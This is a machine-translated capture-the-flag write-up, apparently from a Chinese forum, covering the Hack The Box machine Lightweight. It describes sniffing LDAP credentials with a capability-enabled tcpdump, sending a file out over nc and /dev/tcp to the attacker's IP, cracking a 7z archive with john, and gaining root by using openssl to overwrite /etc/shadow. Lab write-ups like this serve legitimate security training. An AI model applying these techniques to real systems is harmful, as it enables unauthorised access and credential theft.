>> review
Luke recorded at the HTB range
Irked for HTB Range Records
Bank of HTB Range Records
Basartd recorded at HTB Range
OpenAdmin recorded at HTB Range
Popcorn recorded at the HTB range
Europa recorded at the HTB range
Cronos recorded at the HTB range
Arctic recorded at HTB Ranges
SolidState recorded at HTB ranges
Jarvis of HTB Range Recording
This article is a technical article shared by the cousin of the i Spring and Autumn Forum writer "Pika Pikachu", the public account aims to provide you with more learning methods and skills, and the article is for learning reference only.
HTB is a target machine platform, which contains a variety of system types of target machines, and many target machines are very close to the actual combat situation, is a good range for learning penetration testing.
1. Introduction to the target machine
This time, the target machine is Lightweight, a solid medium level.
2. Information collection
Still python autorecon started, after running opened ports 22, 80, 389.
3. Collect 80 port information
Or access port 80 first, can be accessed normally, there are 3 different subpages.
The Info page indicates that there is a WAF will BAN IP, and gobuster indicates that it cannot be scanned.
The Status page indicates that the data is refreshed every minute.
The User page indicates that the password of the account that can allow you to log in to SSH is my IP address.
4. Use the nmap script to collect LDAP port information
Back to port 389, here's an ldap* and not brute nmap script on the web to gather relevant information.
It is also good to use, you can find the relevant account ldapuser1 ldapuser2 and two passwords.
After saving the password, John ran for 4 and a half hours and didn't run out.
5. Log in to port 22 mining information
There is no way but to go to port 22 to log in.
After turning around, I didn't dig up the information, and most of the directories couldn't get in.
There is no way but to pass a LinEnum to the target machine to see if there are any privileged programs that can run.
6. Use LinEnum to assist in mining privilege programs
Here in the run ./LinEnum.sh actually found tcpdump is also in capabilities.
Here is a sentence summarized by the online gangster: Linux capability is a program that allows ordinary users to do things that only super users can do.
At first I was directly thinking of gtfobin turning into root results that were not very good.
Continue to analyze the two capabilities of tcpdump: cap_net_admin and cap_net_raw+ep.
Here you can directly mancapability under kali or look for it on the Internet, summarize the cap_net_admin = perform various network-related operations + change the interface configuration, manage the IP firewall, etc., modify the routing table.
Cap_net_raw = You can use RAW and PACKET's socket + bind any port as proxy listening/fetching packets at the end of the +ep representing adequate and permit profiles that tcpdump is privileged.
7. Use tcpdump to grab packets
Now that we know that tcpdump is a bit of a little privileged, we can log in with ssh and then start tcpdump listening.
-I any=Listens for data on all ports
-U=Packet output
-w -xxx=Filter criteria
Then we need to go back to port 80, randomly click the page and function point to generate point data, wireshark opened the packet and found that the ldap port caught has uid=ldapuser2, and a string of blind guesses related to the password.
Su switched my Superman and managed to get the flag.
8. Use john to crack the 7z password
There is also a backup .7z in the same directory after getting the flag here, so we must pass it to the local area to take good care of the wave.
However scp, Python hangs up can only be passed with nc.
First launch a port locally in kali> filename:
Then execute the cap file name >/dev/tcp/ip/port on the target machine.
Of course there must be a password. However, there is a 7z2john.pl in the john directory that is specifically for 7z compressed packages.
This method can also work on a package that has a password.
If it is not possible to run it directly, you have to install a module with apt.
Finally start the script import and then pair it with the dictionary to run out the password as delete.
There are 4 PHP files in it and finally the account password in the status .php.
Can su succeed.
9. Elevation of rights
Here I just learned Linux capability, and then I found that openssl actually has ep permissions.
Of course, this ep is not the other + ep. +ep is for a function and direct =ep is for all privileges to be operational.
The method of openssl to raise rights can be to use openssl to generate a password, and then generate a new shadow, and replace the new password with the root password to achieve the effect of weight lifting.
You can see that running cat /etc/shadow directly is not possible, and Openssl is running.
Use openssl passwd -1 to generate a new salt password.
Here I set the 123456 or 12345, try it separately.
It is then placed on the newly created shadow file.
After using wget again to receive the file, replace the old /etc/shadow cipher with the privileged program openssl.
Finally switched root successfully.
The above is the content shared today, do you understand it?